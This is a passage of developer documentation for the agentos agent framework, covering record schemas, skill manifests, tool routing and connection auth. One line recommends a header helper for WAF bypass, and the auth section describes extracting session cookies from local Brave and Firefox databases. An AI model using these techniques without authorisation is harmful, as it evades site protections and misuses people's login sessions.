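get_thread("t1", _call=fake_call)  # {"id": "t1", "name": "Hello", ...}
```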
All HTTP goes through agentos.http — never urllib, requests, or httpx directly. The engine handles HTTP/2, decompression, cookie jars, and logging. Use http.headers() for WAF bypass: http.get(url, **http.headers(waf="cf", accept="json")). See Transport & Anti-Bot and SDK Reference for details.
Runtime note
- `agentos mcp` is a proxy to the engine daemon
- If you changed Rust core in `~/dev/agentos`, restart the engine before trusting `mcp:call`
- If Cursor MCP looks stale, use `agentos test` and `npm run mcp:call` as the ground-truth path while you restart the engine or reconnect the editor
Shapes
Shapes are typed record schemas that define the contract between skills and the engine. A shape declares what a record looks like: field names, types, relations to other records, and display rules.
Shapes live in `shapes/*.yaml` in source directories. The engine loads them at boot. Use `agentos test <skill>` to validate that your skill’s output matches the declared shapes (see Testing).
Format
product:
also: [other_shape] # "a product is also a ..." (optional)
fields:
price: string
price_amount: number
prime: boolean
relations:
contains: item[] # array relation
brand: organization # single relation
display:
title: name
subtitle: author
image: image
date: datePublished
columns:
- name: Name
- price: Price
also (tag implication)
Declares that this shape is also another shape. An email is also a message. A book is also a product. When the engine tags a record with `email`, it transitively applies `message` too. Both shapes’ fields contribute to the record’s type context.
`also` is transitive: if A is also B and B is also C, then A is also both B and C.
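The transitive expansion can be sketched as a small closure computation (illustrative only — the engine’s actual implementation is Rust, and the shape names below are made up):

```python
def expand_tags(tag: str, also: dict[str, list[str]]) -> set[str]:
    """Return the tag plus every tag it implies via `also`, transitively."""
    seen: set[str] = set()
    stack = [tag]
    while stack:
        t = stack.pop()
        if t not in seen:
            seen.add(t)
            stack.extend(also.get(t, []))  # follow the `also` edges
    return seen

# Hypothetical shape graph: book → product → offerable
also = {"email": ["message"], "book": ["product"], "product": ["offerable"]}
expand_tags("book", also)   # {"book", "product", "offerable"}
expand_tags("email", also)  # {"email", "message"}
```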
Field types
| Type | Stored as | Notes |
|---|---|---|
string | text | Short text |
text | text | Long text, FTS eligible |
integer | digits | Parsed from strings, floats truncated |
number | decimal | Parsed from strings |
boolean | true/false | Coerced from 1/0, “yes”/“no”, “true”/“false” |
datetime | ISO 8601 | Unix timestamps auto-converted, human dates parsed |
url | text | Stored as-is, rendered as clickable link |
string[] | JSON array | Each element coerced to string |
integer[] | JSON array | Each element coerced to integer |
json | JSON string | Opaque blob, no coercion |
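The coercions in the table can be read roughly as follows — a sketch of the documented rules, not the engine’s code:

```python
def coerce_boolean(value):
    """Coerce 1/0, "yes"/"no", "true"/"false" to bool, per the table."""
    if isinstance(value, bool):
        return value
    if value in (1, "1", "true", "yes"):
        return True
    if value in (0, "0", "false", "no"):
        return False
    raise ValueError(f"not coercible to boolean: {value!r}")

def coerce_integer(value):
    """Parse digit strings, truncate floats, per the table."""
    if isinstance(value, float):
        return int(value)  # truncation toward zero, not rounding
    return int(value)      # handles ints and digit strings

coerce_boolean("yes")  # True
coerce_integer("42")   # 42
coerce_integer(3.9)    # 3
```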
Standard fields
These are available on every record without declaring them in a shape:
| Field | Type | Purpose |
|---|---|---|
id | string | Record identifier |
name | string | Primary label |
text | text | Short summary |
url | url | Canonical link |
image | url | Thumbnail |
author | string | Creator |
published | datetime | Temporal anchor |
content | text | Long body text (FTS, stored separately) |
Relations
Relations declare connections to other records. Keys are edge labels, values are target shapes (shape or shape[] for arrays).
Display
The display section tells renderers how to present this record:
- `title` — primary label field
- `subtitle` — secondary label
- `description` — preview text
- `image` — thumbnail
- `date` — temporal anchor for sort/display
- `columns` — ordered list for table views
Design Principles
These principles guide shape design. Use the review checklist below after writing or editing a shape.
1. Entities over fields
If a field value is itself a thing with identity, it should be a relation to another shape, not a string field.
Bad: `shipping_address: string` (an address is a thing)
Good: `shipping_address: place` (a relation to a place record)
Bad: `email: string` on a person (an email is an account)
Good: `accounts: account[]` relation on person
Ask: “Could this field value have its own page?” If yes, it’s a relation.
2. Separate identity from role
A person doesn’t have a job title. A person holds a role at an organization for a period of time. The role is the relationship, not a field on the person.
Bad: `job_title: string` on person
Good: `role: role[]` relation where the role record carries title, organization, start_date, end_date
Same pattern applies to education, membership, authorship. If it has a time dimension or involves another entity, it’s a role/relationship, not a field.
3. Currency always accompanies price
Any field representing a monetary amount needs a companion currency field. Never assume USD.
Bad: `price_amount: number` alone
Good: `price_amount: number` + `currency: string`
4. URLs that reference other things are relations
The standard url field is the record’s own canonical link. But URLs that point to other things should be relations to the appropriate shape.
Bad: `website: url` on an organization (a website is its own entity)
Good: `website: website` relation
Bad: `external_url: url` on a post (the linked page is a thing)
Good: `links_to: webpage` relation
Ask: “Is this URL the record itself, or does it point to something else?”
- Record’s own link: keep as `url` (standard field)
- Points to another thing: make it a relation
5. Keep shapes domain-agnostic
A shape should describe the kind of thing, not the source it came from. Flight details don’t belong on an offer shape. Browser-specific fields don’t belong on a webpage shape.
Bad: `total_duration: integer`, `flights: json`, `layovers: json` on offer (that’s a flight, not an offer)
Good: offer has `price` + `currency` + `offer_type`. Flight is its own shape. Offer relates to flight.
6. Use also for genuine “is-a” relationships
also means tag implication: tagging a record with shape A also tags it with shape B. Use it when querying by B should include A.
Good uses:
- `email` also `message` (querying messages should include emails)
- `video` also `post` (querying posts should include videos)
- `book` also `product` (querying products should include books)
- `review` also `post` (querying posts should include reviews)
Bad uses:
- Don’t use `also` just because shapes share some fields
- Don’t create deep chains (A also B also C also D) — keep it shallow
7. Author is a shape, not just a string
The standard author field is a string for convenience. But when the author is a real entity with their own identity (a book author, a blog writer, a video creator), use a relation to the author or account shape.
Quick attribution: `author: "Paul Graham"` (standard string field)
Rich attribution: `written_by: author` or `posted_by: account` (relation)
Both can coexist — the string is for display, the relation is for traversal.
8. Address/Place is structured, not a string
Physical locations should be a place shape with structured fields (name, street, city, region, postal_code, country, coordinates). Inspired by Mapbox’s geocoding model.
9. Playlists, shelves, and lists belong to accounts
Any collection (playlist, shelf, list, board) should have a belongs_to: account relation. Collections are owned.
10. Use ISO standards for standardized values
When a field represents something with an international standard, use the standard code:
- Human languages — ISO 639-1 codes (`en`, `es`, `ja`, `pt-BR`). Applies to `transcript.language`, `webpage.language`, content language fields. NOT programming languages (those use conventional names like `Python`, `Rust`).
- Countries — ISO 3166-1 alpha-2 codes (`US`, `GB`, `JP`). Use a `country_code` field.
- Currencies — ISO 4217 codes (`USD`, `EUR`, `JPY`). Use a `currency` field.
- Timezones — IANA timezone names (`America/New_York`, `Europe/London`).
Don’t enforce via enum (too many values). Document the convention and let `agentos test` flag non-compliant values. See Testing & Validation for how to run shape validation.
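A lightweight convention check — illustrative only; `agentos test` is the real mechanism — might just pattern-match the code formats rather than enumerate values:

```python
import re

def looks_like_language_code(code: str) -> bool:
    """ISO 639-1 two-letter code, optionally with a region subtag (pt-BR)."""
    return re.fullmatch(r"[a-z]{2}(-[A-Z]{2})?", code) is not None

def looks_like_country_code(code: str) -> bool:
    """ISO 3166-1 alpha-2: exactly two uppercase letters."""
    return re.fullmatch(r"[A-Z]{2}", code) is not None

def looks_like_currency_code(code: str) -> bool:
    """ISO 4217: exactly three uppercase letters."""
    return re.fullmatch(r"[A-Z]{3}", code) is not None

looks_like_language_code("pt-BR")  # True
looks_like_currency_code("usd")    # False — must be uppercase
```

This only checks the format, not membership in the actual ISO registries — consistent with the “document the convention, don’t enforce an enum” stance above.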
11. Separate content from context (NEPOMUK principle)
A video is a file. The social engagement around it is a post. A transcript is text. The meeting it came from is the context. Don’t mix artifact properties with social properties on the same shape.
Bad: video has `view_count`, `like_count`, `comment_count`, `posted_by` (those are social context)
Good: video is a file with `duration` + `resolution`. A post contains the video and carries the engagement.
Ask: “If I downloaded this to my hard drive, which fields would still make sense?” Those are the artifact fields. Everything else is context that belongs on a wrapper entity.
12. Comments are nested posts, not a separate shape
A comment is a post that replies_to another post. A reply to a message is still a message. Don’t create separate shapes for nested versions of the same thing — use the replies_to relation to express the hierarchy.
13. Booleans describe state, relations describe lineage
`is_fork: boolean` tells you nothing. `forked_from: repository` tells you the lineage. If a boolean implies a relationship to another entity, model the relationship instead.
Bad: `is_fork: boolean` (from what?)
Good: `forked_from: repository` (the source is traversable)
14. Booleans that encode direction are really relationships
`is_outgoing: boolean` on a message means “I sent this.” But that information already lives in the `from: account` relation — if the from account is the user, it’s outgoing. Don’t duplicate relationship semantics as boolean flags.
Bad: `is_outgoing: boolean` on message
Good: `from: account` relation — direction is derived by comparing `from` to the current user
Same pattern: `is_sent`, `is_received`, `is_mine` — all derivable from a directional relation.
15. Booleans that encode cardinality are derivable
`is_group: boolean` on a conversation means “has more than two participants.” That’s not state — it’s a count. Don’t store what you can derive from the structure.
Bad: `is_group: boolean` on conversation
Good: `participant: account[]` relation — `is_group` is `len(participants) > 2`
Same pattern: `has_attachments` (derive from `attachment: file[]`), `has_unread` (derive from messages), `is_empty` (derive from children).
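Principles 14 and 15 can be made concrete as small derivations over the relations. A sketch, not engine code — the field layout follows the typed-ref examples elsewhere in this chapter:

```python
def is_outgoing(message: dict, current_user_handle: str) -> bool:
    """Derived from the `from` relation — no stored flag needed."""
    sender = message.get("from", {}).get("account", {})
    return sender.get("handle") == current_user_handle

def is_group(conversation: dict) -> bool:
    """Derived from participant count, per principle 15."""
    return len(conversation.get("participant", [])) > 2

def has_attachments(message: dict) -> bool:
    """Derived from the attachment relation being non-empty."""
    return bool(message.get("attachment"))

msg = {"from": {"account": {"handle": "me@example.com"}}}
is_outgoing(msg, "me@example.com")          # True
is_group({"participant": ["a", "b", "c"]})  # True
has_attachments({})                          # False
```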
16. Source data doesn’t dictate shape
A skill’s source (API, database, scrape) returns whatever it returns. That doesn’t constrain the shape. The Python function is the transformation boundary — it takes raw source data and returns shape-native dicts.
Apple Contacts gives flat strings: `Organization: Anthropic`, `Title: Engineer`. That doesn’t mean person gets `organization: string`. It means the skill transforms those strings into a `roles: role[]` typed ref.
Bad: “The API returns `platform: string`, so the shape needs a platform field”
Good: “What kind of thing is this? Model it correctly. The skill transforms source data to fit.”
Design shapes for the domain, not for the source. Every skill file is a template — other agents copy the patterns they see.
17. Model life like LinkedIn, not like a spreadsheet
People have roles at organizations. Roles have titles, departments, start dates, end dates. Education is a role at a school. Membership is a role in a community. Authorship is a role on a publication.
The LinkedIn mental model: a person has a timeline of positions, each connecting them to an organization with a title and time range. This is principle #2 made concrete.
person --roles--> role[] --organization--> organization
--title: "Engineer"
--department: "Research"
--start_date: 2024-01-15
--end_date: null (current)
This applies broadly: board membership, team membership, project assignment, course enrollment. If a relationship has a time dimension or a title, it’s a role.
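In shape-native return terms — using the typed-ref convention described under Shapes; every concrete value here is illustrative — the diagram above might come back from a Python operation as:

```python
# A person record with a role timeline, expressed as nested typed refs.
# Outer keys ("roles", "organization") are edge labels; inner keys
# ("role[]", "organization") are entity tags, per the typed-ref contract.
person = {
    "id": "person:ada",          # identity fields keep refs from collapsing
    "name": "Ada Lovelace",
    "roles": {
        "role[]": [
            {
                "name": "Engineer",           # the title doubles as the label
                "department": "Research",
                "start_date": "2024-01-15",
                "end_date": None,             # null = current position
                "organization": {
                    "organization": {"name": "Example Corp"}
                },
            }
        ]
    },
}
```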
Review Checklist
After writing or editing a shape, ask yourself:
- Fields or relations? For each string field, ask: “Is this value itself an entity?” If yes, make it a relation.
- Currency with price? Every monetary amount has a currency companion.
- URLs audited? Is each URL the record’s own link, or does it point to another entity?
- Domain-agnostic? Would this shape make sense for a different source providing the same kind of thing?
- `also` justified? Does the `also` chain represent genuine “is-a” relationships that aid cross-type queries?
- Author modeled correctly? Is the author a string (quick attribution) or a relation (traversable entity)?
- Addresses structured? Are locations/addresses relations to place, not inline strings?
- Collections owned? Do lists/playlists/shelves have a `belongs_to` relation?
- Roles, not fields? Are time-bounded relationships (jobs, education, membership) modeled as role relations, not person fields?
- Display makes sense? Are the right fields in title/subtitle/columns for this shape?
- Content vs context? If this is a media artifact, are social metrics on a wrapper post instead?
- Nesting via reply_to? Is a “sub-type” really just this shape with a parent relation?
- ISO standards? Are languages (ISO 639-1), countries (ISO 3166-1), currencies (ISO 4217) using standard codes?
- Booleans or relations? Does any boolean imply a relationship? (`is_fork` → `forked_from`)
- Direction booleans? Is `is_outgoing` / `is_sent` derivable from a `from` relation?
- Cardinality booleans? Is `is_group` / `has_attachments` derivable from counting a relation?
- Source-independent? Did you design for the domain, or did the API shape leak into the schema?
- Roles modeled as LinkedIn? Are jobs/education/memberships `role[]` relations with title + org + time range?
Returning shape-native data from operations
When an operation declares `returns: email[]`, the Python function returns dicts whose keys match the shape. The shape is the contract — no separate mapping layer sits between the Python code and the engine.
# shapes/email.yaml
email:
also: [message]
fields:
from_email: string
to: string[]
cc: string[]
labels: string[]
thread_id: string
relations:
from: account
conversation: conversation
display:
title: name
subtitle: from_email
date: datePublished
# skill.yaml
operations:
get_email:
returns: email # points to the email shape
python:
module: ./gmail.py
function: get_email
# gmail.py — returns email-shaped dicts directly
def get_email(id: str, _call=None) -> dict:
return {
"id": msg_id,
"name": subject, # standard field
"text": snippet, # standard field
"url": web_url, # standard field
"published": date, # standard field
"content": body_text, # standard field (FTS)
"from_email": sender, # shape-specific field
"to": recipients, # shape-specific field
"labels": label_ids, # shape-specific field
}
The Python code does the field mapping — it transforms raw API responses into shape-native dicts. Standard fields (id, name, text, url, image, author, published, content) are available on every shape without declaring them.
Canonical fields
The renderer resolves entity display from standard fields. Every Python return should populate as many of these as the source data supports — they drive consistent previews, detail views, and search results across all skills.
| Field | Purpose |
|---|---|
name | Primary label / title |
text | Short summary or snippet for preview rows |
url | Clickable link |
image | Thumbnail / hero image |
author | Creator / brand / owner |
published | Temporal anchor |
content | Long body text (stored separately, FTS-indexed) |
Not every entity has all of these — a product may have no published, an order may have no image. Map what the source provides; skip what doesn’t apply.
Typed references (entity relationships)
To create linked entities and graph edges, return nested dicts keyed by entity type:
def get_email(id: str, _call=None) -> dict:
return {
"id": msg_id,
"name": subject,
# Single typed ref — creates: email --from--> account
"from": {
"account": {
"handle": sender_email,
"platform": "email",
"display_name": sender_name,
}
},
# Array typed ref — creates: email --to--> account (one per recipient)
"to": {
"account[]": [
{"handle": addr, "platform": "email", "display_name": name}
for addr, name in recipients
]
},
}
The outer key (`from`, `to`) becomes the edge label. The inner key (`account`, `account[]`) is the entity tag. The engine auto-creates/deduplicates the linked entity and adds the edge.
A typed ref is collapsed to `null` if none of its identity fields (`id` or `name`) survive — so partial data doesn’t create ghost entities.
Validation
Shape conformance is checked at two levels:
Pre-commit (static)
`bin/audit-skills.py` parses Python return dict literals via AST and warns if keys don’t match the declared shape. Runs automatically on every commit. Catches dict-literal returns but misses dynamic construction, helper functions, and `_call` composition.
Runtime
The engine validates every entity-returning skill call after execution. If the returned data contains keys not declared in the shape (fields, relations, or standard fields), a warning is logged to `engine.log`. Missing identity fields (`id` and `name`) also trigger warnings.
Runtime validation catches everything the static check misses — it sees the actual data. Check `~/.agentos/logs/engine.log` for “Shape conformance” warnings after running a skill.
Both checks are advisory (warnings, not errors). They exist to surface non-conformant skills, not to block execution.
Prior Research
Extensive entity modeling research lives in /Users/joe/dev/entity-experiments/. These are not authoritative — many are outdated — but contain valuable principles and platform analysis worth consulting when designing new shapes.
Entity & Ontology Research
- `schema-entities.md` — Core entity type definitions, OGP foundation, Joe’s hypotheses on note vs article
- `schema-relationships.md` — Relationship type catalog and design patterns
- `research/entities/open-graph-protocol.md` — OGP types, why flat beats hierarchical
- `research/entities/google-structured-data.md` — Schema.org structured data patterns
Platform Research
- `research/platforms/google-takeout.md` — 72 Google products analyzed for entity types (Contacts, Calendar, Drive, Gmail, Photos, YouTube, Maps, Chrome, Pay, Play)
- `research/platforms/facebook-graph.md` — Facebook Graph API entity model
- `research/platforms/familysearch.md` — GEDCOM X genealogical data model (two relationship types + qualifiers, computed derivations, source citations)
Relationship Research
- `research/relationships/genealogical-relationships.md` — Family relationship modeling patterns
- `research/relationships/relationship-modeling.md` — General relationship design
- `research/relationships/schema-org-relationships.md` — Schema.org relationship types
- `research/relationships/ogp-relationships.md` — OGP relationship patterns
- `research/relationships/no-orphans-constraint.md` — Why every entity needs at least one connection
Systems Research
- `research/systems/outcome-entity.md` — Outcome/goal entity modeling
- `research/context/pkm-community.md` — Personal knowledge management patterns
- `research/context/semantic-file-systems.md` — NEPOMUK and semantic desktop research
Skill Anatomy
The short version
The current skill style is:
- Use `connections:` for external service dependencies (auth, base URLs)
- Use `returns:` on operations to declare the shape (entity type) the operation produces
- Python modules return dicts matching the shape schema directly — no mapping layer
- Use simple `snake_case` tool names like `search`, `read_webpage`, or `send_text`
- Use `operations:` for both entity-returning tools and local-control/action tools
- Use inline `returns:` schemas for non-entity or action-style tools
- Validate live behavior through the direct MCP path, not just by reading YAML
Folder shape
Every skill is a folder like:
skills/
my-skill/
skill.yaml # required — executable manifest (connections, operations, …)
readme.md # recommended before ship — markdown instructions for agents (no YAML front matter)
requirements.md # recommended — scope out the API, auth model, and entities before writing YAML
my_helper.py # optional — Python helper when inline command logic gets complex
The runtime loads only `skill.yaml` for structure; `readme.md` is merged in as the instruction body (markdown only, no YAML front matter).
Start with `requirements.md` before writing skill YAML. Use it to scope out what endpoints or data surfaces exist, what auth model the service uses, which entities map to what, and any decisions or trade-offs. This is useful for any skill — not just reverse-engineered ones. For web skills without public APIs, it also becomes the place to log endpoint discoveries, header mysteries, and auth boundary mappings. See the Reverse Engineering section for that playbook.
Entity skill shape
Use this pattern for normal data-fetching or CRUD-ish skills.
id: my-skill
name: My Skill
description: One-line description
website: https://example.com
connections:
api:
base_url: "https://api.example.com"
auth:
type: api_key
header:
Authorization: '"Bearer " + .auth.key'
label: API Key
help_url: https://example.com/api-keys
operations:
search:
description: Search the service
returns: result[]
params:
query: { type: string, required: true }
limit: { type: integer, required: false }
python:
module: ./search.py
function: search
timeout: 30
The `returns: result[]` declaration points to a shape defined in `shapes/result.yaml`. The Python function returns a list of dicts whose keys match that shape’s fields:
def search(query: str, limit: int = 10, _call=None) -> list[dict]:
# ... API logic ...
return [
{
"id": item["url"],
"name": item["title"],
"text": item.get("summary"),
"url": item["url"],
"image": item.get("image"),
"author": item.get("author"),
"datePublished": item.get("published_at"),
}
for item in results
]
The Python code is where field mapping happens — it transforms raw API data into shape-native dicts. No separate mapping layer needed.
Local control shape
Use this pattern for command-backed skills such as terminal, browser, OS, or app control. Local skills have no connections: block — they don’t need external auth.
id: my-local-skill
name: My Local Skill
description: Control a local surface
website: https://example.com
operations:
list_status:
description: Inspect local state
returns:
ok: boolean
cwd: string
command:
binary: python3
args:
- -c
- |
import json, os
print(json.dumps({"ok": True, "cwd": os.getcwd()}))
timeout: 10
If you are starting a new skill from scratch, use `npm run new-skill -- my-skill` for an entity scaffold or `npm run new-skill -- my-skill --local-control` for a local-control scaffold.
Operations
Operations are skill tools — the things agents can call.
Entity operations
When an operation returns data that maps to an entity type, declare the shape with `returns:`:
operations:
list_emails:
description: List emails with full content
returns: email[] # array of email entities
python:
module: ./gmail.py
function: list_emails
timeout: 120
get_email:
description: Get a specific email
returns: email # single email entity
python:
module: ./gmail.py
function: get_email
timeout: 30
`returns: email[]` means “this operation returns an array of records matching the email shape.” The Python function must return dicts with keys matching the shape’s fields (see Shapes for field definitions and standard fields).
Rules:
- Use `snake_case` — prefer short, obvious names like `search`, `read_webpage`, `list_tasks`
- Use `returns: entity[]` for list/search results, `returns: entity` for single entities
- The Python module does the field mapping — transform raw API data into shape-native dicts
- Pass caller-provided limits through to the API when the backend supports them
- Use relative `rest.url` paths (e.g. `/tasks/filter`) when the connection has a `base_url`
- Use absolute URLs only when a skill has no connection or the endpoint is on a different domain
Action operations
Use an inline returns: schema when one of these is true:
- The return value is not an entity
- The tool is an action, not a normal entity read/write
- The tool returns a custom inline schema
operations:
send_email:
description: Send a new email
returns: email # still an entity — the sent email
python:
module: ./gmail.py
function: send_email
timeout: 30
delete_label:
description: Delete a Gmail label
returns:
status: string # inline schema — not an entity
python:
module: ./gmail.py
function: delete_label
timeout: 15
Rules:
- Operation names should still be `snake_case`
- Prefer direct, concrete verbs like `send_text`, `focus_tab`, `list_status`
- Test them through `mcp:call` early, because runtime mismatches are easier to miss than YAML mismatches
Capabilities (dynamic MCP tools)
Skills can surface first-class MCP tools via `provides:`. Each `provides:` tool entry generates a top-level MCP tool (like `web_search`, `web_read`, `flight_search`) that agents see alongside the built-in tools. No hardcoded Rust is needed — the engine reads `provides:` from installed skills at startup.
Registration is skill-level. Add a `provides:` list entry with `tool:` (MCP tool name) and `via:` (operation name). An optional `urls:` list declares URL patterns for routing (URL-specific providers are preferred over generic ones).
# Generic provider — always eligible
provides:
- tool: web_search
via: search
# URL-specific provider — preferred when URL matches
provides:
- tool: web_read
via: transcript_video
urls:
- "youtube.com/*"
- "youtu.be/*"
When multiple skills provide the same tool name, the engine:
- Intersects params across all providers (only common params appear on the MCP tool)
- Routes calls by: explicit `skill` param > URL pattern match > credentialed provider > no-auth fallback
- Adds a note in the tool description pointing to `load()` for provider-specific advanced options
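That routing order can be sketched as follows — a sketch only: `fnmatch` stands in for whatever pattern matching the engine actually uses, and the provider dict fields are hypothetical:

```python
from fnmatch import fnmatch

def pick_provider(providers: list[dict], url: str = None, skill: str = None) -> dict:
    """Explicit skill > URL pattern match > credentialed > no-auth fallback."""
    if skill:  # 1. caller named a skill explicitly
        return next(p for p in providers if p["skill"] == skill)
    if url:    # 2. URL-specific providers beat generic ones
        for p in providers:
            if any(fnmatch(url, f"*{pat}*") for pat in p.get("urls", [])):
                return p
    for p in providers:  # 3. prefer a provider with credentials
        if p.get("credentialed"):
            return p
    return providers[0]  # 4. no-auth fallback

providers = [
    {"skill": "curl", "credentialed": False},
    {"skill": "youtube", "urls": ["youtube.com/*"], "credentialed": True},
]
pick_provider(providers, url="https://youtube.com/watch?v=x")["skill"]  # "youtube"
pick_provider(providers, skill="curl")["skill"]                          # "curl"
```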
Current dynamic tools (from installed skills):
- `web_search` — brave, exa
- `web_read` — firecrawl, exa, curl (generic); youtube, reddit (URL-specific)
- `flight_search` — serpapi
To verify dynamic tools appear:
cd ~/dev/agentos
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp"
Credential and cookie providers use the same `provides:` list with `auth:` entries (see Connections & Auth).
Connections & Auth
Every skill declares its external service dependencies as named `connections:`. Each connection can carry `base_url`, `auth` (with a `type` discriminator), optional `description`, `label`, `help_url`, `optional`, and local data sources:
- `sqlite:` — path to a SQLite file (tilde-expanded). SQL operations bind to the connection that declares the database; there is no top-level `database:` on the skill.
- `vars:` — non-secret config (paths, filenames) merged into the executor context (e.g. `params.connection.vars` for Python) so scripts can read local files without hardcoding home-directory paths.
Local skills (no external services) simply omit the connections: block.
Common patterns
Most common — single API key connection:
connections:
api:
base_url: "https://api.example.com/v1"
auth:
type: api_key
header:
x-api-key: .auth.key
label: API Key
help_url: https://example.com/api-keys
Multi-connection — public GraphQL + authenticated web session:
connections:
graphql:
base_url: "https://api.example.com/graphql"
web:
auth:
type: cookies
domain: ".example.com"
Multi-backend — same service, different transports (e.g. SDK + CLI):
connections:
sdk:
description: "Python SDK — typed models, batch ops, biometric auth"
vars:
account_name: "my-account"
cli:
description: "CLI tool — stable JSON contract, fallback path"
vars:
binary_path: "/opt/homebrew/bin/mytool"
When connections differ by transport rather than service, each operation declares which it supports (`connection: [sdk, cli]`). The Python helper receives `connection` as a param and dispatches to the appropriate backend. Both paths normalize output into the same adapter-compatible shape. Use this when: (a) a v0 SDK needs a stable CLI fallback, (b) read ops work with both but writes need the SDK for batch/typed APIs, or (c) offline/online modes with the same data model.
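A hedged sketch of that dispatch — the backend helpers here are stand-ins (a real skill would call the SDK or shell out to the CLI), but the shape of the pattern is what matters: one entry point, per-backend fetch, shared normalization:

```python
def list_items(connection: str = "sdk", _call=None) -> list[dict]:
    """Dispatch to the backend the caller chose; both normalize the same way."""
    raw = _list_via_sdk() if connection == "sdk" else _list_via_cli()
    # Both paths converge on the same shape-native dicts.
    return [{"id": r["uid"], "name": r["label"]} for r in raw]

def _list_via_sdk() -> list[dict]:
    # Stand-in for the typed SDK call (batch ops, rich models).
    return [{"uid": "1", "label": "From SDK"}]

def _list_via_cli() -> list[dict]:
    # Stand-in for invoking the CLI and parsing its stable JSON output.
    return [{"uid": "1", "label": "From CLI"}]

list_items(connection="cli")  # [{"id": "1", "name": "From CLI"}]
```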
Rules
- `base_url` on a connection is used to resolve relative `rest.url` and `graphql.endpoint` values
- Single-connection skills auto-infer the connection — no `connection:` needed on each operation
- Multi-connection skills must declare `connection:` on each operation: either one name (`connection: api`) or a list (`connection: [api, cache]`) when the caller may choose the backing source (live API vs local cache, etc.)
- With `connection: [a, b, …]`, the first entry is the default; expose `connection` in `params` and pass it through from Python/rest/graphql so the runtime resolves the effective connection (see `skills/granola/skill.yaml` for `params.connection` wired into `args`)
- Set `connection: none` on operations that should skip auth entirely
- Use `optional: true` if the skill works anonymously but improves with credentials
- Connections without any auth fields (just `base_url`, `sqlite`, `vars`, and/or `description`) are valid — they serve as service declarations
Connection names are arbitrary. Common conventions:
- api — REST API with key/token auth
- graphql — GraphQL/AppSync (may or may not have auth)
- web — cookie-authenticated website (user session)
Auth types
All auth is declared under a single auth: key with a type discriminator. Three types are supported.
api_key — API keys/tokens injected via header, query, or body templates with jaq expressions:
connections:
api:
auth:
type: api_key
header:
Authorization: '"Bearer " + .auth.key'
label: API Key
cookies — session cookies resolved from the credential store (for stored sessions) or provider skills (Brave, Firefox, Playwright):
connections:
web:
auth:
type: cookies
domain: ".claude.ai"
names: ["sessionKey"]
oauth — OAuth 2.0 token refresh and provider-based acquisition:
connections:
gmail:
auth:
type: oauth
service: google
scopes:
- https://mail.google.com/
Resolution algorithm
Cookie auth uses timestamp-based resolution — all sources are checked, and the one with the newest cookies wins. There is no fixed priority order and no TTL-based expiry.
Sources
Three sources of cookies exist, each with different freshness characteristics:
| Source | What it is | Freshness |
|---|---|---|
| In-memory cache | Cookies from the last extraction, updated by Set-Cookie responses from our own HTTP requests (writeback). Lives in engine process memory. | Can be newer than the browser — when a server rotates a session token via Set-Cookie in response to our request, the cache has the new value before the browser does. |
| Browser providers (Brave, Firefox) | Fresh extraction from the browser’s local cookie database. | Reflects the user’s latest browsing — if they just visited Amazon and got a fresh session, the browser has the newest cookies. |
| Credential store (credentials.sqlite) | Persistent copy of cookies, also updated by writeback. Survives engine restart. | Same data as the cache, but persistent. Staler than the cache if writeback updated the cache since last store write. |
How it works
1. Gather candidates from ALL sources:
a. In-memory cache (instant — HashMap lookup)
b. Browser providers (~20ms — local SQLite reads)
c. Credential store (~1ms — local SQLite read)
2. Score each candidate:
- Filter expired cookies
- Build cookie header string
- Compute newest_cookie_at (latest per-cookie timestamp)
3. Pick the candidate with the highest newest_cookie_at.
On ties, the first candidate (cache) wins.
4. If winner is from cache → return immediately (identity already known)
If winner is from a provider → run account_check for identity, persist to store + cache
If winner is from store → return as-is (fallback)
5. If no candidates → error with help_url
6. On SESSION_EXPIRED or 401/403 → exclude failed provider, retry
Per-cookie timestamps
Every cookie carries a timestamp tracking when it was last set:
- Browser cookies have a
createdfield (Unix seconds with sub-second precision) from the browser’s cookie database. Brave and Firefox both provide this. - Writeback cookies (from
Set-Cookieresponses to our HTTP requests) get stamped withnow()when the engine processes the response. This is how our cache becomes newer than the browser after a server-side token rotation. - Store cookies carry a
cookie_timestampsmap in the value blob, updated on writeback viamerge_cookie_header.
The newest_cookie_at for a candidate is the maximum timestamp across all its cookies. This single number determines who wins.
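The scoring step can be sketched in a few lines. This is a simplified model, not the engine’s Rust implementation — candidate and cookie field names here are hypothetical:

```python
def newest_cookie_at(candidate):
    """Latest per-cookie timestamp — the single number that decides the winner."""
    return max(c["created"] for c in candidate["cookies"])

def pick_winner(candidates):
    # Python's max() keeps the first maximal element, so listing the cache
    # first preserves the "cache wins ties" behavior.
    return max(candidates, key=newest_cookie_at)

candidates = [
    {"source": "cache", "cookies": [{"name": "session_token", "created": 1712019800.0}]},
    {"source": "brave", "cookies": [{"name": "session_token", "created": 1712019700.5}]},
]
print(pick_winner(candidates)["source"])  # → cache (writeback stamped it newer)
```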
Example: why timestamps matter
Call 1 (cold start — no cache):
Cache: empty
Brave: session_token created at 1712019700.5 ← winner (only candidate)
Store: empty
→ Extracts from Brave, runs account_check, persists to store + cache
Call 2 (cache populated):
Cache: session_token at 1712019700.5
Brave: session_token at 1712019700.5 (same — user hasn't browsed)
Store: session_token at 1712019700.5
→ Tie — cache wins (first candidate). No account_check needed. ~58ms.
Call 3 (server rotated token via Set-Cookie):
Cache: session_token at 1712019800.0 ← winner (writeback stamped now())
Brave: session_token at 1712019700.5
Store: session_token at 1712019800.0
→ Cache wins. The server gave US the new token; the browser doesn't have it yet.
Call 4 (user browsed Amazon, got fresh cookies):
Cache: session_token at 1712019800.0
Brave: session_token at 1712019900.3 ← winner (user's browsing is newest)
Store: session_token at 1712019800.0
→ Brave wins. Fresh extraction, account_check runs, cache + store updated.
Why no TTL?
Previous versions used a 5-minute TTL on the cache — entries older than 5 minutes were treated as stale. This was arbitrary and wrong in both directions: too aggressive when writeback kept the cache genuinely fresh, too lenient when the browser got new cookies 30 seconds later.
Timestamps replace TTL entirely. A cache entry from 10 minutes ago still wins if its cookies are genuinely newer than what the browser has. A cache entry from 1 second ago loses if the browser has fresher cookies. The timestamp is the only arbiter.
Playwright
Playwright (live browser session via CDP) is always skipped unless explicitly requested via the provider parameter. It launches a visible Chrome window — too expensive and disruptive for automatic resolution. Use it for reverse engineering and login flows, not for runtime auth.
Cookie format contract for Python
When a Python function receives .auth.cookies (via args: { cookies: .auth.cookies } in skill.yaml), the value is a cookie header string — e.g. "name1=val1; name2=val2". This is the same format as the HTTP Cookie header.
Pass it directly to agentos.http:
from agentos import http
# Simple request
resp = http.get(url, cookies=cookie_header, **http.headers(accept="json"))
# Session with cookie jar
